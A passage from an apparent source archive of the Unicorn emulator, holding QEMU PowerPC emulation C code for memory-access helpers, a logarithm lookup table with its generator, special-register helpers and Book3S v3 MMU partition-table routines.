POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL | POWERPC_EXCP_INVAL_LSWX, GETPC()); } else { do_lsw(env, addr, xer_bc, reg, GETPC()); } } } void helper_stsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx; char *host; uint32_t val; if (unlikely(nb == 0)) { return; } mmu_idx = cpu_mmu_index(env, false); host = probe_contiguous(env, addr, nb, MMU_DATA_STORE, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; nb > 3; nb -= 4) { stl_be_p(host, env->gpr[reg]); reg = (reg + 1) % 32; host += 4; } val = env->gpr[reg]; switch (nb) { case 1: stb_p(host, val >> 24); break; case 2: stw_be_p(host, val >> 16); break; case 3: stw_be_p(host, val >> 16); stb_p(host + 2, val >> 8); break; } } else { for (; nb > 3; nb -= 4) { cpu_stl_mmuidx_ra(env, addr, env->gpr[reg], mmu_idx, raddr); reg = (reg + 1) % 32; addr = addr_add(env, addr, 4); } val = env->gpr[reg]; switch (nb) { case 1: cpu_stb_mmuidx_ra(env, addr, val >> 24, mmu_idx, raddr); break; case 2: cpu_stw_mmuidx_ra(env, addr, val >> 16, mmu_idx, raddr); break; case 3: cpu_stw_mmuidx_ra(env, addr, val >> 16, mmu_idx, raddr); addr = addr_add(env, addr, 2); cpu_stb_mmuidx_ra(env, addr, val >> 8, mmu_idx, raddr); break; } } } static void dcbz_common(CPUPPCState *env, target_ulong addr, uint32_t opcode, bool epid, uintptr_t retaddr) { target_ulong mask, dcbz_size = env->dcache_line_size; uint32_t i; void *haddr; int mmu_idx = epid ? 
PPC_TLB_EPID_STORE : env->dmmu_idx; #if defined(TARGET_PPC64) /* Check for dcbz vs dcbzl on 970 */ if (env->excp_model == POWERPC_EXCP_970 && !(opcode & 0x00200000) && ((env->spr[SPR_970_HID5] >> 7) & 0x3) == 1) { dcbz_size = 32; } #endif /* Align address */ mask = ~(dcbz_size - 1); addr &= mask; /* Check reservation */ if ((env->reserve_addr & mask) == addr) { #ifdef _MSC_VER env->reserve_addr = (target_ulong)(0ULL - 1ULL); #else env->reserve_addr = (target_ulong)-1ULL; #endif } /* Try fast path translate */ haddr = probe_write(env, addr, dcbz_size, mmu_idx, retaddr); if (haddr) { memset(haddr, 0, dcbz_size); } else { /* Slow path */ for (i = 0; i < dcbz_size; i += 8) { cpu_stq_mmuidx_ra(env, addr + i, 0, mmu_idx, retaddr); } } } void helper_dcbz(CPUPPCState *env, target_ulong addr, uint32_t opcode) { dcbz_common(env, addr, opcode, false, GETPC()); } void helper_dcbzep(CPUPPCState *env, target_ulong addr, uint32_t opcode) { dcbz_common(env, addr, opcode, true, GETPC()); } void helper_icbi(CPUPPCState *env, target_ulong addr) { addr &= ~(env->dcache_line_size - 1); /* * Invalidate one cache line : * PowerPC specification says this is to be treated like a load * (not a fetch) by the MMU. To be sure it will be so, * do the load "by hand". */ cpu_ldl_data_ra(env, addr, GETPC()); } void helper_icbiep(CPUPPCState *env, target_ulong addr) { /* See comments above */ addr &= ~(env->dcache_line_size - 1); cpu_ldl_mmuidx_ra(env, addr, PPC_TLB_EPID_LOAD, GETPC()); } /* XXX: to be tested */ target_ulong helper_lscbx(CPUPPCState *env, target_ulong addr, uint32_t reg, uint32_t ra, uint32_t rb) { int i, c, d; d = 24; for (i = 0; i < xer_bc; i++) { c = cpu_ldub_data_ra(env, addr, GETPC()); addr = addr_add(env, addr, 1); /* ra (if not 0) and rb are never modified */ if (likely(reg != rb && (ra == 0 || reg != ra))) { env->gpr[reg] = (env->gpr[reg] & ~(0xFF << d)) | (c << d); } if (unlikely(c == xer_cmp)) { break; } if (likely(d != 0)) { d -= 8; } else { d = 24; reg++; reg = reg & 0x1F; } } return i; } #ifdef TARGET_PPC64 uint64_t helper_lq_le_parallel(CPUPPCState *env, target_ulong addr, uint32_t opidx) { Int128 ret; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); ret = helper_atomic_ldo_le_mmu(env, addr, opidx, GETPC()); env->retxh = int128_gethi(ret); return int128_getlo(ret); } uint64_t helper_lq_be_parallel(CPUPPCState *env, target_ulong addr, uint32_t opidx) { Int128 ret; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); ret = helper_atomic_ldo_be_mmu(env, addr, opidx, GETPC()); env->retxh = int128_gethi(ret); return int128_getlo(ret); } void helper_stq_le_parallel(CPUPPCState *env, target_ulong addr, uint64_t lo, uint64_t hi, uint32_t opidx) { Int128 val; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); val = int128_make128(lo, hi); helper_atomic_sto_le_mmu(env, addr, val, opidx, GETPC()); } void helper_stq_be_parallel(CPUPPCState *env, target_ulong addr, uint64_t lo, uint64_t hi, uint32_t opidx) { Int128 val; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_ATOMIC128); val = int128_make128(lo, hi); helper_atomic_sto_be_mmu(env, addr, val, opidx, GETPC()); } uint32_t helper_stqcx_le_parallel(CPUPPCState *env, target_ulong addr, uint64_t new_lo, uint64_t new_hi, uint32_t opidx) { bool success = false; /* We will have raised EXCP_ATOMIC from the translator. 
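 * That is, when the host lacks a native 128-bit cmpxchg the translator
 * exits to the serialized slow path instead of calling this helper, so
 * the assertion below should never fire at runtime.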
*/ assert(HAVE_CMPXCHG128); if (likely(addr == env->reserve_addr)) { Int128 oldv, cmpv, newv; cmpv = int128_make128(env->reserve_val2, env->reserve_val); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, opidx, GETPC()); success = int128_eq(oldv, cmpv); } env->reserve_addr = -1; return env->so + success * CRF_EQ_BIT; } uint32_t helper_stqcx_be_parallel(CPUPPCState *env, target_ulong addr, uint64_t new_lo, uint64_t new_hi, uint32_t opidx) { bool success = false; /* We will have raised EXCP_ATOMIC from the translator. */ assert(HAVE_CMPXCHG128); if (likely(addr == env->reserve_addr)) { Int128 oldv, cmpv, newv; cmpv = int128_make128(env->reserve_val2, env->reserve_val); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, opidx, GETPC()); success = int128_eq(oldv, cmpv); } env->reserve_addr = -1; return env->so + success * CRF_EQ_BIT; } #endif /*****************************************************************************/ /* Altivec extension helpers */ #if defined(HOST_WORDS_BIGENDIAN) #define HI_IDX 0 #define LO_IDX 1 #else #define HI_IDX 1 #define LO_IDX 0 #endif /* * We use msr_le to determine index ordering in a vector. However, * byteswapping is not simply controlled by msr_le. We also need to * take into account endianness of the target. This is done for the * little-endian PPC64 user-mode target. */ #define LVE(name, access, swap, element) \ void helper_##name(CPUPPCState *env, ppc_avr_t *r, \ target_ulong addr) \ { \ size_t n_elems = ARRAY_SIZE(r->element); \ int adjust = HI_IDX * (n_elems - 1); \ int sh = sizeof(r->element[0]) >> 1; \ int index = (addr & 0xf) >> sh; \ if (msr_le) { \ index = n_elems - index - 1; \ } \ \ if (needs_byteswap(env)) { \ r->element[LO_IDX ? index : (adjust - index)] = \ swap(access(env, addr, GETPC())); \ } else { \ r->element[LO_IDX ? index : (adjust - index)] = \ access(env, addr, GETPC()); \ } \ } #define I(x) (x) LVE(lvebx, cpu_ldub_data_ra, I, u8) LVE(lvehx, cpu_lduw_data_ra, bswap16, u16) LVE(lvewx, cpu_ldl_data_ra, bswap32, u32) #undef I #undef LVE #define STVE(name, access, swap, element) \ void helper_##name(CPUPPCState *env, ppc_avr_t *r, \ target_ulong addr) \ { \ size_t n_elems = ARRAY_SIZE(r->element); \ int adjust = HI_IDX * (n_elems - 1); \ int sh = sizeof(r->element[0]) >> 1; \ int index = (addr & 0xf) >> sh; \ if (msr_le) { \ index = n_elems - index - 1; \ } \ \ if (needs_byteswap(env)) { \ access(env, addr, swap(r->element[LO_IDX ? index : \ (adjust - index)]), \ GETPC()); \ } else { \ access(env, addr, r->element[LO_IDX ? index : \ (adjust - index)], GETPC()); \ } \ } #define I(x) (x) STVE(stvebx, cpu_stb_data_ra, I, u8) STVE(stvehx, cpu_stw_data_ra, bswap16, u16) STVE(stvewx, cpu_stl_data_ra, bswap32, u32) #undef I #undef LVE #ifdef TARGET_PPC64 #define GET_NB(rb) ((rb >> 56) & 0xFF) #define VSX_LXVL(name, lj) \ void helper_##name(CPUPPCState *env, target_ulong addr, \ ppc_vsr_t *xt, target_ulong rb) \ { \ ppc_vsr_t t; \ uint64_t nb = GET_NB(rb); \ int i; \ \ t.s128 = int128_zero(); \ if (nb) { \ nb = (nb >= 16) ? 
16 : nb; \ if (msr_le && !lj) { \ for (i = 16; i > 16 - nb; i--) { \ t.VsrB(i - 1) = cpu_ldub_data_ra(env, addr, GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } else { \ for (i = 0; i < nb; i++) { \ t.VsrB(i) = cpu_ldub_data_ra(env, addr, GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } \ } \ *xt = t; \ } VSX_LXVL(lxvl, 0) VSX_LXVL(lxvll, 1) #undef VSX_LXVL #define VSX_STXVL(name, lj) \ void helper_##name(CPUPPCState *env, target_ulong addr, \ ppc_vsr_t *xt, target_ulong rb) \ { \ target_ulong nb = GET_NB(rb); \ int i; \ \ if (!nb) { \ return; \ } \ \ nb = (nb >= 16) ? 16 : nb; \ if (msr_le && !lj) { \ for (i = 16; i > 16 - nb; i--) { \ cpu_stb_data_ra(env, addr, xt->VsrB(i - 1), GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } else { \ for (i = 0; i < nb; i++) { \ cpu_stb_data_ra(env, addr, xt->VsrB(i), GETPC()); \ addr = addr_add(env, addr, 1); \ } \ } \ } VSX_STXVL(stxvl, 0) VSX_STXVL(stxvll, 1) #undef VSX_STXVL #undef GET_NB #endif /* TARGET_PPC64 */ #undef HI_IDX #undef LO_IDX void helper_tbegin(CPUPPCState *env) { /* * As a degenerate implementation, always fail tbegin. The reason * given is "Nesting overflow". The "persistent" bit is set, * providing a hint to the error handler to not retry. The TFIAR * captures the address of the failure, which is this tbegin * instruction. Instruction execution will continue with the next * instruction in memory, which is precisely what we want. */ env->spr[SPR_TEXASR] = (1ULL << TEXASR_FAILURE_PERSISTENT) | (1ULL << TEXASR_NESTING_OVERFLOW) | (msr_hv << TEXASR_PRIVILEGE_HV) | (msr_pr << TEXASR_PRIVILEGE_PR) | (1ULL << TEXASR_FAILURE_SUMMARY) | (1ULL << TEXASR_TFIAR_EXACT); env->spr[SPR_TFIAR] = env->nip | (msr_hv << 1) | msr_pr; env->spr[SPR_TFHAR] = env->nip + 4; env->crf[0] = 0xB; /* 0b1010 = transaction failure */ } ���������������������������unicorn-2.1.1/qemu/target/ppc/mfrom_table.inc.c�����������������������������������������������������0000664�0000000�0000000�00000006443�14675241067�0021435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������static const uint8_t mfrom_ROM_table[602] = { 77, 77, 76, 76, 75, 75, 74, 74, 73, 73, 72, 72, 71, 71, 70, 70, 69, 69, 68, 68, 68, 67, 67, 66, 66, 65, 65, 64, 64, 64, 63, 63, 62, 62, 61, 61, 61, 60, 60, 59, 59, 58, 58, 58, 57, 57, 56, 56, 56, 55, 55, 54, 54, 54, 53, 53, 53, 52, 52, 51, 51, 51, 50, 50, 50, 49, 49, 49, 48, 48, 47, 47, 47, 46, 46, 46, 45, 45, 45, 44, 44, 44, 43, 43, 43, 42, 42, 42, 42, 41, 41, 41, 40, 40, 40, 39, 39, 39, 39, 38, 38, 38, 37, 37, 37, 37, 36, 36, 36, 35, 35, 35, 35, 34, 34, 34, 34, 33, 33, 33, 33, 32, 32, 32, 32, 31, 31, 31, 31, 30, 30, 30, 30, 29, 29, 29, 29, 28, 28, 28, 28, 28, 27, 27, 27, 27, 26, 26, 26, 26, 26, 25, 25, 25, 25, 25, 24, 24, 24, 24, 24, 23, 23, 23, 23, 23, 23, 22, 22, 22, 22, 22, 21, 21, 21, 21, 21, 21, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 19, 19, 19, 18, 18, 18, 18, 18, 18, 17, 17, 17, 17, 17, 17, 17, 16, 16, 16, 16, 16, 16, 16, 16, 15, 15, 15, 15, 15, 15, 15, 15, 14, 14, 14, 14, 14, 14, 14, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, }; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mfrom_table_gen.c�����������������������������������������������������0000664�0000000�0000000�00000001224�14675241067�0021506�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#define _GNU_SOURCE #include "qemu/osdep.h" #include <math.h> int main(void) { double d; uint8_t n; int i; printf("static const uint8_t mfrom_ROM_table[602] =\n{\n "); for (i = 0; i < 602; i++) { /* * Extremely decomposed: * -T0 / 256 * T0 = 256 * log10(10 + 1.0) + 0.5 */ d = -i; d /= 256.0; d = exp10(d); d += 1.0; d = log10(d); d *= 256; d += 0.5; n = d; printf("%3d, ", n); if ((i & 7) == 7) { printf("\n "); } } printf("\n};\n"); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/misc_helper.c���������������������������������������������������������0000664�0000000�0000000�00000021050�14675241067�0020657�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Miscellaneous PowerPC emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "helper_regs.h" /*****************************************************************************/ /* SPR accesses */ void helper_load_dump_spr(CPUPPCState *env, uint32_t sprn) { #if 0 qemu_log("Read SPR %d %03x => " TARGET_FMT_lx "\n", sprn, sprn, env->spr[sprn]); #endif } void helper_store_dump_spr(CPUPPCState *env, uint32_t sprn) { #if 0 qemu_log("Write SPR %d %03x <= " TARGET_FMT_lx "\n", sprn, sprn, env->spr[sprn]); #endif } #ifdef TARGET_PPC64 static void raise_hv_fu_exception(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause, uintptr_t raddr) { qemu_log_mask(CPU_LOG_INT, "HV Facility %d is unavailable (%s)\n", bit, caller); env->spr[SPR_HFSCR] &= ~((target_ulong)FSCR_IC_MASK << FSCR_IC_POS); raise_exception_err_ra(env, POWERPC_EXCP_HV_FU, cause, raddr); } static void raise_fu_exception(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause, uintptr_t raddr) { // qemu_log("Facility SPR %d is unavailable (SPR FSCR:%d)\n", sprn, bit); env->spr[SPR_FSCR] &= ~((target_ulong)FSCR_IC_MASK << FSCR_IC_POS); cause &= FSCR_IC_MASK; env->spr[SPR_FSCR] |= (target_ulong)cause << FSCR_IC_POS; raise_exception_err_ra(env, POWERPC_EXCP_FU, 0, raddr); } #endif void helper_hfscr_facility_check(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause) { #ifdef TARGET_PPC64 if ((env->msr_mask & MSR_HVB) && !msr_hv && !(env->spr[SPR_HFSCR] & (1ULL << bit))) { raise_hv_fu_exception(env, bit, caller, cause, GETPC()); } #endif } void helper_fscr_facility_check(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause) { #ifdef TARGET_PPC64 if (env->spr[SPR_FSCR] & (1ULL << bit)) { /* Facility is enabled, continue */ return; } raise_fu_exception(env, bit, sprn, cause, GETPC()); #endif } void helper_msr_facility_check(CPUPPCState *env, uint32_t bit, uint32_t sprn, uint32_t cause) { #ifdef TARGET_PPC64 if (env->msr & (1ULL << bit)) { /* Facility is enabled, continue */ return; } raise_fu_exception(env, bit, sprn, cause, GETPC()); #endif } void helper_store_sdr1(CPUPPCState *env, target_ulong val) { if (env->spr[SPR_SDR1] != val) { ppc_store_sdr1(env, val); tlb_flush(env_cpu(env)); } } #if defined(TARGET_PPC64) void helper_store_ptcr(CPUPPCState *env, target_ulong val) { if (env->spr[SPR_PTCR] != val) { ppc_store_ptcr(env, val); tlb_flush(env_cpu(env)); } } void helper_store_pcr(CPUPPCState *env, target_ulong value) { PowerPCCPU *cpu = env_archcpu(env); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); env->spr[SPR_PCR] = value & pcc->pcr_mask; } /* * DPDES register is shared. Each bit reflects the state of the * doorbell interrupt of a thread of the same core. 
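 * Since this TCG model implements a single thread per core (see the
 * TODO notes below), only bit 0 -- the calling thread's own doorbell
 * -- is ever significant here.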
*/ target_ulong helper_load_dpdes(CPUPPCState *env) { target_ulong dpdes = 0; helper_hfscr_facility_check(env, HFSCR_MSGP, "load DPDES", HFSCR_IC_MSGP); /* TODO: TCG supports only one thread */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DOORBELL)) { dpdes = 1; } return dpdes; } void helper_store_dpdes(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); helper_hfscr_facility_check(env, HFSCR_MSGP, "store DPDES", HFSCR_IC_MSGP); /* TODO: TCG supports only one thread */ if (val & ~0x1) { qemu_log_mask(LOG_GUEST_ERROR, "Invalid DPDES register value " TARGET_FMT_lx"\n", val); return; } if (val & 0x1) { env->pending_interrupts |= 1 << PPC_INTERRUPT_DOORBELL; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } else { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); } } #endif /* defined(TARGET_PPC64) */ void helper_store_pidr(CPUPPCState *env, target_ulong val) { env->spr[SPR_BOOKS_PID] = val; tlb_flush(env_cpu(env)); } void helper_store_lpidr(CPUPPCState *env, target_ulong val) { env->spr[SPR_LPIDR] = val; /* * We need to flush the TLB on LPID changes as we only tag HV vs * guest in TCG TLB. Also the quadrants means the HV will * potentially access and cache entries for the current LPID as * well. */ tlb_flush(env_cpu(env)); } void helper_store_hid0_601(CPUPPCState *env, target_ulong val) { target_ulong hid0; hid0 = env->spr[SPR_HID0]; if ((val ^ hid0) & 0x00000008) { /* Change current endianness */ env->hflags &= ~(1 << MSR_LE); env->hflags_nmsr &= ~(1 << MSR_LE); env->hflags_nmsr |= (1 << MSR_LE) & (((val >> 3) & 1) << MSR_LE); env->hflags |= env->hflags_nmsr; // qemu_log("%s: set endianness to %c => " TARGET_FMT_lx "\n", __func__, // val & 0x8 ? 'l' : 'b', env->hflags); } env->spr[SPR_HID0] = (uint32_t)val; } void helper_store_403_pbr(CPUPPCState *env, uint32_t num, target_ulong value) { if (likely(env->pb[num] != value)) { env->pb[num] = value; /* Should be optimized */ tlb_flush(env_cpu(env)); } } void helper_store_40x_dbcr0(CPUPPCState *env, target_ulong val) { store_40x_dbcr0(env, val); } void helper_store_40x_sler(CPUPPCState *env, target_ulong val) { store_40x_sler(env, val); } /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ target_ulong helper_clcs(CPUPPCState *env, uint32_t arg) { switch (arg) { case 0x0CUL: /* Instruction cache line size */ return env->icache_line_size; break; case 0x0DUL: /* Data cache line size */ return env->dcache_line_size; break; case 0x0EUL: /* Minimum cache line size */ return (env->icache_line_size < env->dcache_line_size) ? env->icache_line_size : env->dcache_line_size; break; case 0x0FUL: /* Maximum cache line size */ return (env->icache_line_size > env->dcache_line_size) ? env->icache_line_size : env->dcache_line_size; break; default: /* Undefined */ return 0; break; } } /*****************************************************************************/ /* Special registers manipulation */ /* GDBstub can read and write MSR... */ void ppc_store_msr(CPUPPCState *env, target_ulong value) { hreg_store_msr(env, value, 0); } /* * This code is lifted from MacOnLinux. It is called whenever THRM1,2 * or 3 is read an fixes up the values in such a way that will make * MacOS not hang. These registers exist on some 75x and 74xx * processors. 
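 * In this model, THRM1 and THRM2 hold the valid, threshold and status
 * bits that get patched below, while THRM3 only gates the fixup
 * through its enable bit (THRM3_E).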
*/ void helper_fixup_thrm(CPUPPCState *env) { target_ulong v, t; int i; #define THRM1_TIN (1 << 31) #define THRM1_TIV (1 << 30) #define THRM1_THRES(x) (((x) & 0x7f) << 23) #define THRM1_TID (1 << 2) #define THRM1_TIE (1 << 1) #define THRM1_V (1 << 0) #define THRM3_E (1 << 0) if (!(env->spr[SPR_THRM3] & THRM3_E)) { return; } /* Note: Thermal interrupts are unimplemented */ for (i = SPR_THRM1; i <= SPR_THRM2; i++) { v = env->spr[i]; if (!(v & THRM1_V)) { continue; } v |= THRM1_TIV; v &= ~THRM1_TIN; t = v & THRM1_THRES(127); if ((v & THRM1_TID) && t < THRM1_THRES(24)) { v |= THRM1_TIN; } if (!(v & THRM1_TID) && t > THRM1_THRES(24)) { v |= THRM1_TIN; } env->spr[i] = v; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-book3s-v3.c�������������������������������������������������������0000664�0000000�0000000�00000004307�14675241067�0020715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC ISAV3 BookS emulation generic mmu helpers for qemu. * * Copyright (c) 2017 Suraj Jitindar Singh, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "mmu-hash64.h" #include "mmu-book3s-v3.h" #include "mmu-radix64.h" int ppc64_v3_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { if (ppc64_v3_radix(cpu)) { /* Guest uses radix */ return ppc_radix64_handle_mmu_fault(cpu, eaddr, rwx, mmu_idx); } else { /* Guest uses hash */ return ppc_hash64_handle_mmu_fault(cpu, eaddr, rwx, mmu_idx); } } hwaddr ppc64_v3_get_phys_page_debug(PowerPCCPU *cpu, vaddr eaddr) { if (ppc64_v3_radix(cpu)) { return ppc_radix64_get_phys_page_debug(cpu, eaddr); } else { return ppc_hash64_get_phys_page_debug(cpu, eaddr); } } bool ppc64_v3_get_pate(PowerPCCPU *cpu, target_ulong lpid, ppc_v3_pate_t *entry) { uint64_t patb = cpu->env.spr[SPR_PTCR] & PTCR_PATB; uint64_t pats = cpu->env.spr[SPR_PTCR] & PTCR_PATS; /* Calculate number of entries */ pats = 1ull << (pats + 12 - 4); if (pats <= lpid) { return false; } /* Grab entry */ patb += 16 * lpid; #ifdef UNICORN_ARCH_POSTFIX entry->dw0 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, patb); entry->dw1 = glue(ldq_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, patb + 8); #else entry->dw0 = ldq_phys(cpu->env.uc, CPU(cpu)->as, patb); entry->dw1 = ldq_phys(cpu->env.uc, CPU(cpu)->as, patb + 8); #endif return true; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-book3s-v3.h�������������������������������������������������������0000664�0000000�0000000�00000006424�14675241067�0020724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC ISAV3 BookS emulation generic mmu definitions for qemu. * * Copyright (c) 2017 Suraj Jitindar Singh, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef PPC_MMU_BOOK3S_V3_H #define PPC_MMU_BOOK3S_V3_H #include "mmu-hash64.h" /* * Partition table definitions */ #define PTCR_PATB 0x0FFFFFFFFFFFF000ULL /* Partition Table Base */ #define PTCR_PATS 0x000000000000001FULL /* Partition Table Size */ /* Partition Table Entry Fields */ #define PATE0_HR 0x8000000000000000 /* * WARNING: This field doesn't actually exist in the final version of * the architecture and is unused by hardware. 
However, qemu uses it * as an indication of a radix guest in the pseudo-PATB entry that it * maintains for SPAPR guests and in the migration stream, so we need * to keep it around */ #define PATE1_GR 0x8000000000000000 /* Process Table Entry */ struct prtb_entry { uint64_t prtbe0, prtbe1; }; #ifdef TARGET_PPC64 static inline bool ppc64_use_proc_tbl(PowerPCCPU *cpu) { return !!(cpu->env.spr[SPR_LPCR] & LPCR_UPRT); } bool ppc64_v3_get_pate(PowerPCCPU *cpu, target_ulong lpid, ppc_v3_pate_t *entry); /* * The LPCR:HR bit is a shortcut that avoids having to * dig out the partition table in the fast path. This is * also how the HW uses it. */ static inline bool ppc64_v3_radix(PowerPCCPU *cpu) { return !!(cpu->env.spr[SPR_LPCR] & LPCR_HR); } hwaddr ppc64_v3_get_phys_page_debug(PowerPCCPU *cpu, vaddr eaddr); int ppc64_v3_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx); static inline hwaddr ppc_hash64_hpt_base(PowerPCCPU *cpu) { uint64_t base; #if 0 if (cpu->vhyp) { return 0; } #endif if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc_v3_pate_t pate; if (!ppc64_v3_get_pate(cpu, cpu->env.spr[SPR_LPIDR], &pate)) { return 0; } base = pate.dw0; } else { base = cpu->env.spr[SPR_SDR1]; } return base & SDR_64_HTABORG; } static inline hwaddr ppc_hash64_hpt_mask(PowerPCCPU *cpu) { uint64_t base; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); return vhc->hpt_mask(cpu->vhyp); } #endif if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc_v3_pate_t pate; if (!ppc64_v3_get_pate(cpu, cpu->env.spr[SPR_LPIDR], &pate)) { return 0; } base = pate.dw0; } else { base = cpu->env.spr[SPR_SDR1]; } return (1ULL << ((base & SDR_64_HTABSIZE) + 18 - 7)) - 1; } #endif /* TARGET_PPC64 */ #endif /* PPC_MMU_BOOK3S_V3_H */ 